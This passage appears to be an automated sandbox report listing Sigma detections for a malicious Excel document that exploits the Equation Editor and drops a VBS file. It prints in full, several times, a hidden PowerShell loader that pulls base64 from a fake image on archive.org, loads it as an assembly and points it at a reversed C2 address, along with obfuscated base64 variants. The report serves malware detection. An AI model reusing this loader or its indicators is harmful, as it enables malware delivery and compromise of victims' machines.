            Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 300, TargetFilename: C:\Users\user\AppData\Roaming\mekissedbutterburnwithstrong.vBS

            System Summary

            barindex
            Sigma detected: Base64 Encoded PowerShell Command Detected
            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?VQBy? ? ? ? ?Gw? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?JwBo? ? ? ? ?HQ? ? ? ? ?d? ? ? ? ?Bw? ? ? ? ?HM? ? ? ? ?Og? ? ? ? ?v? ? ? ? ?C8? ? ? ? ?aQBh? ? ? ? ?Dg? ? ? ? ?M? ? ? ? ?? ? ? ? ?z? ? ? ? ?DE? ? ? ? ?M? ? ? ? ?? ? ? ? ?0? ? ? ? ?C4? ? ? ? ?dQBz? ? ? ? ?C4? ? ? ? ?YQBy? ? ? ? ?GM? ? ? ? ?a? ? ? ? ?Bp? ? ? ? ?HY? ? ? ? ?ZQ? ? ? ? ?u? ? ? ? ?G8? ? ? ? ?cgBn? ? ? ? ?C8? ? ? ? ?Mg? ? ? ? ?3? ? ? ? ?C8? ? ? ? ?aQB0? ? ? ? ?GU? ? ? ? ?bQBz? ? ? ? ?C8? ? ? ? ?dgBi? ? ? ? ?HM? ? ? ? ?Xw? ? ? ? ?y? ? ? ? ?D? ? ? ? ?? ? ? ? ?Mg? ? ? ? ?0? ? ? ? ?D? ? ? ? ?? ? ? ? ?Nw? ? ? ? ?y? ? ? ? ?DY? ? ? ? ?Xw? ? ? ? ?y? ? ? ? ?D? ? ? ? ?? ? ? ? ?Mg? ? ? ? ?0? ? ? ? ?D? ? ? ? ?? ? ? ? ?Nw? ? ? ? ?y? ? ? ? ?DY? ? ? ? ?LwB2? ? ? ? ?GI? ? ? ? ?cw? ? ? ? ?u? ? ? ? ?Go? ? ? ? ?c? ? ? ? ?Bn? ? ? ? ?Cc? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?Hc? ? ? ? ?ZQBi? ? ? ? ?EM? ? ? ? ?b? ? ? ? ?Bp? ? ? ? ?GU? ? ? ? ?bgB0? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?E4? ? ? ? ?ZQB3? ? ? ? ?C0? ? ? ? ?TwBi? ? ? ? ?Go? ? ? ? ?ZQBj? ? ? ? ?HQ? ? ? ? ?I? ? ? ? ?BT? ? ? ? ?Hk? ? ? ? ?cwB0? ? ? ? ?GU? ? ? ? ?bQ? ? ? ? ?u? ? ? ? ?E4? ? ? ? ?ZQB0? ? ? ? ?C4? ? ? ? ?VwBl? ? ? ? ?GI? ? ? ? ?QwBs? ? ? ? ?Gk? ? ? ? ?ZQBu? ? ? ? ?HQ? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?Gk? ? ? ? ?bQBh? ? ? ? ?Gc? ? ? ? ?ZQBC? ? ? ? ?Hk? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?HM? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?J? ? ? ? ?B3? ? ? ? ?GU? ? ? ? ?YgBD? ? ? ? ?Gw? ? ? ? ?aQBl? ? ? ? ?G4? ? ? ? ?d? ? ? ? ?? ? ? ? ?u? ? ? ? ?EQ? ? ? ? ?bwB3? ? ? ? ?G4? ? ? ? ?b? ? ? ? ?Bv? ? ? ? ?GE? ? ? ? ?Z? ? ? ? ?BE? ? ? ? ?GE? ? ? ? ?d? ? ? ? ?Bh? ? ? ? ?Cg? ? ? ? ?J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?VQBy? ? ? ? ?Gw? ? ? ? ?KQ? ? ? ? ?7? ? ? ? ?CQ? ? ? ? ?aQBt? ? ? ? ?GE? ? ? ? ?ZwBl? ? ? ? ?FQ? ? ? ? ?ZQB4? ? ? ? ?HQ? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?WwBT? ? ? ? ?Hk? ? ? ? ?cwB0? ? ? ? ?GU? ? ? ? ?bQ? ? ? ? ?u? ? ? ? ?FQ? ? ? ? ?ZQB4? ? ? ? ?HQ? ? ? ? ?LgBF? ? ? ? ?G4? ? ? ? ?YwBv? ? ? ? ?GQ? ? ? ? ?aQBu? ? ? ? ?Gc? ? ? ? ?XQ? ? ? ? ?6? ? ? ? ?Do? ? ? ? ?VQBU? ? ? ? ?EY? ? ? ? ?O? ? ? ? ?? ? ? ? ?u? ? ? ? ?Ec? ? ? ? ?ZQB0? ? ? ? ?FM? ? ? ? ?d? ? ? ? ?By? ? ? ? ?Gk? ? ? ? ?bgBn? ? ? ? ?Cg? ? ? ? ?J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?QgB5? ? ? ? ?HQ? ? ? ? ?ZQBz? ? ? ? ?Ck? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?HM? ? ? ? ?d? ? ? ? ?Bh? ? ? ? ?HI? ? ? ? ?d? ? ? ? ?BG? ? ? ? ?Gw? ? ? ? ?YQBn? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?Cc? ? ? ? ?P? ? ? ? ?? ? ? ? ?8? ? ? ? ?EI? ? ? ? ?QQBT? ? ? ? ?EU? ? ? ? ?Ng? ? ? ? ?0? ? ? ? ?F8? ? ? ? ?UwBU? ? ? ? ?EE? ? ? ? ?UgBU? ? ? ? ?D4? ? ? ? ?Pg? ? ? ? ?n? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?Bl? ? ? ? ?G4? ? ? ? ?Z? ? ? ? ?BG? ? ? ? ?Gw? ? ? ? ?YQBn? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?Cc? ? ? ? ?P? ? ? ? ?? ? ? ? ?8? ? ? ? ?EI? ? ? ? ?QQBT? ? ? ? ?EU? ? ? ? ?Ng? ? ? ?
            Sigma detected: Equation Editor Network Connection
            Source: Network ConnectionAuthor: Max Altgelt (Nextron Systems): Data: DestinationIp: 192.168.2.22, DestinationIsIpv6: false, DestinationPort: 49170, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 300, Protocol: tcp, SourceIp: 192.210.150.33, SourceIsIpv6: false, SourcePort: 80
            Sigma detected: Potential PowerShell Obfuscation Via Reversed Commands
            Source: Process startedAuthor: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://ia803104.us.archive.org/27/items/vbs_20240726_20240726/vbs.jpg';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('dnlib.IO.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.GRW/341/33.051.012.291//:ptth' , 'desativado' , 'desativado' , 'desativado','RegAsm',''))", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://ia803104.us.archive.org/27/items/vbs_20240726_20240726/vbs.jpg';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('dnlib.IO.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.GRW/341/33.051.012.291//:ptth' , 'desativado' , 'desativado' , 'desativado','RegAsm',''))", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?VQBy? ? ? ? ?Gw? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?JwBo? ? ? ? ?HQ? ? ? ? ?d? ? ? ? ?Bw? ? ? ? ?HM? ? ? ? ?Og? ? ? ? ?v? ? ? ? ?C8? ? ? ? ?aQBh? ? ? ? ?Dg? ? ? ? ?M? ? ? ? ?? ? ? ? ?z? ? ? ? ?DE? ? ? ? ?M? ? ? ? ?? ? ? ? ?0? ? ? ? ?C4? ? ? ? ?dQBz? ? ? ? ?C4? ? ? ? ?YQBy? ? ? ? ?GM? ? ? ? ?a? ? ? ? ?Bp? ? ? ? ?HY? ? ? ? ?ZQ? ? ? ? ?u? ? ? ? ?G8? ? ? ? ?cgBn? ? ? ? ?C8? ? ? ? ?Mg? ? ? ? ?3? ? ? ? ?C8? ? ? ? ?aQB0? ? ? ? ?GU? ? ? ? ?bQBz? ? ? ?
            Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?VQBy? ? ? ? ?Gw? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?JwBo? ? ? ? ?HQ? ? ? ? ?d? ? ? ? ?Bw? ? ? ? ?HM? ? ? ? ?Og? ? ? ? ?v? ? ? ? ?C8? ? ? ? ?aQBh? ? ? ? ?Dg? ? ? ? ?M? ? ? ? ?? ? ? ? ?z? ? ? ? ?DE? ? ? ? ?M? ? ? ? ?? ? ? ? ?0? ? ? ? ?C4? ? ? ? ?dQBz? ? ? ? ?C4? ? ? ? ?YQBy? ? ? ? ?GM? ? ? ? ?a? ? ? ? ?Bp? ? ? ? ?HY? ? ? ? ?ZQ? ? ? ? ?u? ? ? ? ?G8? ? ? ? ?cgBn? ? ? ? ?C8? ? ? ? ?Mg? ? ? ? ?3? ? ? ? ?C8? ? ? ? ?aQB0? ? ? ? ?GU? ? ? ? ?bQBz? ? ? ? ?C8? ? ? ? ?dgBi? ? ? ? ?HM? ? ? ? ?Xw? ? ? ? ?y? ? ? ? ?D? ? ? ? ?? ? ? ? ?Mg? ? ? ? ?0? ? ? ? ?D? ? ? ? ?? ? ? ? ?Nw? ? ? ? ?y? ? ? ? ?DY? ? ? ? ?Xw? ? ? ? ?y? ? ? ? ?D? ? ? ? ?? ? ? ? ?Mg? ? ? ? ?0? ? ? ? ?D? ? ? ? ?? ? ? ? ?Nw? ? ? ? ?y? ? ? ? ?DY? ? ? ? ?LwB2? ? ? ? ?GI? ? ? ? ?cw? ? ? ? ?u? ? ? ? ?Go? ? ? ? ?c? ? ? ? ?Bn? ? ? ? ?Cc? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?Hc? ? ? ? ?ZQBi? ? ? ? ?EM? ? ? ? ?b? ? ? ? ?Bp? ? ? ? ?GU? ? ? ? ?bgB0? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?E4? ? ? ? ?ZQB3? ? ? ? ?C0? ? ? ? ?TwBi? ? ? ? ?Go? ? ? ? ?ZQBj? ? ? ? ?HQ? ? ? ? ?I? ? ? ? ?BT? ? ? ? ?Hk? ? ? ? ?cwB0? ? ? ? ?GU? ? ? ? ?bQ? ? ? ? ?u? ? ? ? ?E4? ? ? ? ?ZQB0? ? ? ? ?C4? ? ? ? ?VwBl? ? ? ? ?GI? ? ? ? ?QwBs? ? ? ? ?Gk? ? ? ? ?ZQBu? ? ? ? ?HQ? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?Gk? ? ? ? ?bQBh? ? ? ? ?Gc? ? ? ? ?ZQBC? ? ? ? ?Hk? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?HM? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?J? ? ? ? ?B3? ? ? ? ?GU? ? ? ? ?YgBD? ? ? ? ?Gw? ? ? ? ?aQBl? ? ? ? ?G4? ? ? ? ?d? ? ? ? ?? ? ? ? ?u? ? ? ? ?EQ? ? ? ? ?bwB3? ? ? ? ?G4? ? ? ? ?b? ? ? ? ?Bv? ? ? ? ?GE? ? ? ? ?Z? ? ? ? ?BE? ? ? ? ?GE? ? ? ? ?d? ? ? ? ?Bh? ? ? ? ?Cg? ? ? ? ?J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?VQBy? ? ? ? ?Gw? ? ? ? ?KQ? ? ? ? ?7? ? ? ? ?CQ? ? ? ? ?aQBt? ? ? ? ?GE? ? ? ? ?ZwBl? ? ? ? ?FQ? ? ? ? ?ZQB4? ? ? ? ?HQ? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?WwBT? ? ? ? ?Hk? ? ? ? ?cwB0? ? ? ? ?GU? ? ? ? ?bQ? ? ? ? ?u? ? ? ? ?FQ? ? ? ? ?ZQB4? ? ? ? ?HQ? ? ? ? ?LgBF? ? ? ? ?G4? ? ? ? ?YwBv? ? ? ? ?GQ? ? ? ? ?aQBu? ? ? ? ?Gc? ? ? ? ?XQ? ? ? ? ?6? ? ? ? ?Do? ? ? ? ?VQBU? ? ? ? ?EY? ? ? ? ?O? ? ? ? ?? ? ? ? ?u? ? ? ? ?Ec? ? ? ? ?ZQB0? ? ? ? ?FM? ? ? ? ?d? ? ? ? ?By? ? ? ? ?Gk? ? ? ? ?bgBn? ? ? ? ?Cg? ? ? ? ?J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?QgB5? ? ? ? ?HQ? ? ? ? ?ZQBz? ? ? ? ?Ck? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?HM? ? ? ? ?d? ? ? ? ?Bh? ? ? ? ?HI? ? ? ? ?d? ? ? ? ?BG? ? ? ? ?Gw? ? ? ? ?YQBn? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?Cc? ? ? ? ?P? ? ? ? ?? ? ? ? ?8? ? ? ? ?EI? ? ? ? ?QQBT? ? ? ? ?EU? ? ? ? ?Ng? ? ? ? ?0? ? ? ? ?F8? ? ? ? ?UwBU? ? ? ? ?EE? ? ? ? ?UgBU? ? ? ? ?D4? ? ? ? ?Pg? ? ? ? ?n? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?Bl? ? ? ? ?G4? ? ? ? ?Z? ? ? ? ?BG? ? ? ? ?Gw? ? ? ? ?YQBn? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?Cc? ? ? ? ?P? ? ? ? ?? ? ? ? ?8? ? ? ? ?EI? ? ? ? ?QQBT? ? ? ? ?EU? ? ? ? ?Ng? ? ? ?
            Sigma detected: Suspicious Microsoft Office Child Process
            Source: Process startedAuthor: Florian Roth (Nextron Systems), Markus Neis, FPT.EagleEye Team, Vadim Khrykov, Cyb3rEng, Michael Haag, Christopher Peacock @securepeacock, @scythe_io: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\mekissedbutterburnwithstrong.vBS" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\mekissedbutterburnwithstrong.vBS" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ParentProcessId: 2456, ParentProcessName: EXCEL.EXE, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\mekissedbutterburnwithstrong.vBS" , ProcessId: 3104, ProcessName: wscript.exe
            Sigma detected: WScript or CScript Dropper
            Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\mekissedbutterburnwithstrong.vBS" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\mekissedbutterburnwithstrong.vBS" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ParentProcessId: 2456, ParentProcessName: EXCEL.EXE, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\mekissedbutterburnwithstrong.vBS" , ProcessId: 3104, ProcessName: wscript.exe
            Sigma detected: Change PowerShell Policies to an Insecure Level
            Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?VQBy? ? ? ? ?Gw? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?JwBo? ? ? ? ?HQ? ? ? ? ?d? ? ? ? ?Bw? ? ? ? ?HM? ? ? ? ?Og? ? ? ? ?v? ? ? ? ?C8? ? ? ? ?aQBh? ? ? ? ?Dg? ? ? ? ?M? ? ? ? ?? ? ? ? ?z? ? ? ? ?DE? ? ? ? ?M? ? ? ? ?? ? ? ? ?0? ? ? ? ?C4? ? ? ? ?dQBz? ? ? ? ?C4? ? ? ? ?YQBy? ? ? ? ?GM? ? ? ? ?a? ? ? ? ?Bp? ? ? ? ?HY? ? ? ? ?ZQ? ? ? ? ?u? ? ? ? ?G8? ? ? ? ?cgBn? ? ? ? ?C8? ? ? ? ?Mg? ? ? ? ?3? ? ? ? ?C8? ? ? ? ?aQB0? ? ? ? ?GU? ? ? ? ?bQBz? ? ? ? ?C8? ? ? ? ?dgBi? ? ? ? ?HM? ? ? ? ?Xw? ? ? ? ?y? ? ? ? ?D? ? ? ? ?? ? ? ? ?Mg? ? ? ? ?0? ? ? ? ?D? ? ? ? ?? ? ? ? ?Nw? ? ? ? ?y? ? ? ? ?DY? ? ? ? ?Xw? ? ? ? ?y? ? ? ? ?D? ? ? ? ?? ? ? ? ?Mg? ? ? ? ?0? ? ? ? ?D? ? ? ? ?? ? ? ? ?Nw? ? ? ? ?y? ? ? ? ?DY? ? ? ? ?LwB2? ? ? ? ?GI? ? ? ? ?cw? ? ? ? ?u? ? ? ? ?Go? ? ? ? ?c? ? ? ? ?Bn? ? ? ? ?Cc? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?Hc? ? ? ? ?ZQBi? ? ? ? ?EM? ? ? ? ?b? ? ? ? ?Bp? ? ? ? ?GU? ? ? ? ?bgB0? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?E4? ? ? ? ?ZQB3? ? ? ? ?C0? ? ? ? ?TwBi? ? ? ? ?Go? ? ? ? ?ZQBj? ? ? ? ?HQ? ? ? ? ?I? ? ? ? ?BT? ? ? ? ?Hk? ? ? ? ?cwB0? ? ? ? ?GU? ? ? ? ?bQ? ? ? ? ?u? ? ? ? ?E4? ? ? ? ?ZQB0? ? ? ? ?C4? ? ? ? ?VwBl? ? ? ? ?GI? ? ? ? ?QwBs? ? ? ? ?Gk? ? ? ? ?ZQBu? ? ? ? ?HQ? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?Gk? ? ? ? ?bQBh? ? ? ? ?Gc? ? ? ? ?ZQBC? ? ? ? ?Hk? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?HM? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?J? ? ? ? ?B3? ? ? ? ?GU? ? ? ? ?YgBD? ? ? ? ?Gw? ? ? ? ?aQBl? ? ? ? ?G4? ? ? ? ?d? ? ? ? ?? ? ? ? ?u? ? ? ? ?EQ? ? ? ? ?bwB3? ? ? ? ?G4? ? ? ? ?b? ? ? ? ?Bv? ? ? ? ?GE? ? ? ? ?Z? ? ? ? ?BE? ? ? ? ?GE? ? ? ? ?d? ? ? ? ?Bh? ? ? ? ?Cg? ? ? ? ?J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?VQBy? ? ? ? ?Gw? ? ? ? ?KQ? ? ? ? ?7? ? ? ? ?CQ? ? ? ? ?aQBt? ? ? ? ?GE? ? ? ? ?ZwBl? ? ? ? ?FQ? ? ? ? ?ZQB4? ? ? ? ?HQ? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?WwBT? ? ? ? ?Hk? ? ? ? ?cwB0? ? ? ? ?GU? ? ? ? ?bQ? ? ? ? ?u? ? ? ? ?FQ? ? ? ? ?ZQB4? ? ? ? ?HQ? ? ? ? ?LgBF? ? ? ? ?G4? ? ? ? ?YwBv? ? ? ? ?GQ? ? ? ? ?aQBu? ? ? ? ?Gc? ? ? ? ?XQ? ? ? ? ?6? ? ? ? ?Do? ? ? ? ?VQBU? ? ? ? ?EY? ? ? ? ?O? ? ? ? ?? ? ? ? ?u? ? ? ? ?Ec? ? ? ? ?ZQB0? ? ? ? ?FM? ? ? ? ?d? ? ? ? ?By? ? ? ? ?Gk? ? ? ? ?bgBn? ? ? ? ?Cg? ? ? ? ?J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?QgB5? ? ? ? ?HQ? ? ? ? ?ZQBz? ? ? ? ?Ck? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?HM? ? ? ? ?d? ? ? ? ?Bh? ? ? ? ?HI? ? ? ? ?d? ? ? ? ?BG? ? ? ? ?Gw? ? ? ? ?YQBn? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?Cc? ? ? ? ?P? ? ? ? ?? ? ? ? ?8? ? ? ? ?EI? ? ? ? ?QQBT? ? ? ? ?EU? ? ? ? ?Ng? ? ? ? ?0? ? ? ? ?F8? ? ? ? ?UwBU? ? ? ? ?EE? ? ? ? ?UgBU? ? ? ? ?D4? ? ? ? ?Pg? ? ? ? ?n? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?Bl? ? ? ? ?G4? ? ? ? ?Z? ? ? ? ?BG? ? ? ? ?Gw? ? ? ? ?YQBn? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?Cc? ? ? ? ?P? ? ? ? ?? ? ? ? ?8? ? ? ? ?EI? ? ? ? ?QQBT? ? ? ? ?EU? ? ? ? ?Ng? ? ? ?
            Sigma detected: Excel Network Connections
            Source: Network ConnectionAuthor: Christopher Peacock '@securepeacock', SCYTHE '@scythe_io', Florian Roth '@Neo23x0", Tim Shelton: Data: DestinationIp: 188.114.97.3, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, Initiated: true, ProcessId: 2456, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49161
            Sigma detected: Suspicious Office Outbound Connections
            Source: Network ConnectionAuthor: X__Junior (Nextron Systems): Data: DestinationIp: 192.168.2.22, DestinationIsIpv6: false, DestinationPort: 49161, EventID: 3, Image: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, Initiated: true, ProcessId: 2456, Protocol: tcp, SourceIp: 188.114.97.3, SourceIsIpv6: false, SourcePort: 443
            Sigma detected: Suspicious PowerShell Invocations - Specific - ProcessCreation
            Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://ia803104.us.archive.org/27/items/vbs_20240726_20240726/vbs.jpg';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('dnlib.IO.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.GRW/341/33.051.012.291//:ptth' , 'desativado' , 'desativado' , 'desativado','RegAsm',''))", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://ia803104.us.archive.org/27/items/vbs_20240726_20240726/vbs.jpg';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('dnlib.IO.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.GRW/341/33.051.012.291//:ptth' , 'desativado' , 'desativado' , 'desativado','RegAsm',''))", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?VQBy? ? ? ? ?Gw? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?JwBo? ? ? ? ?HQ? ? ? ? ?d? ? ? ? ?Bw? ? ? ? ?HM? ? ? ? ?Og? ? ? ? ?v? ? ? ? ?C8? ? ? ? ?aQBh? ? ? ? ?Dg? ? ? ? ?M? ? ? ? ?? ? ? ? ?z? ? ? ? ?DE? ? ? ? ?M? ? ? ? ?? ? ? ? ?0? ? ? ? ?C4? ? ? ? ?dQBz? ? ? ? ?C4? ? ? ? ?YQBy? ? ? ? ?GM? ? ? ? ?a? ? ? ? ?Bp? ? ? ? ?HY? ? ? ? ?ZQ? ? ? ? ?u? ? ? ? ?G8? ? ? ? ?cgBn? ? ? ? ?C8? ? ? ? ?Mg? ? ? ? ?3? ? ? ? ?C8? ? ? ? ?aQB0? ? ? ? ?GU? ? ? ? ?bQBz? ? ? ?
            Sigma detected: Usage Of Web Request Commands And Cmdlets
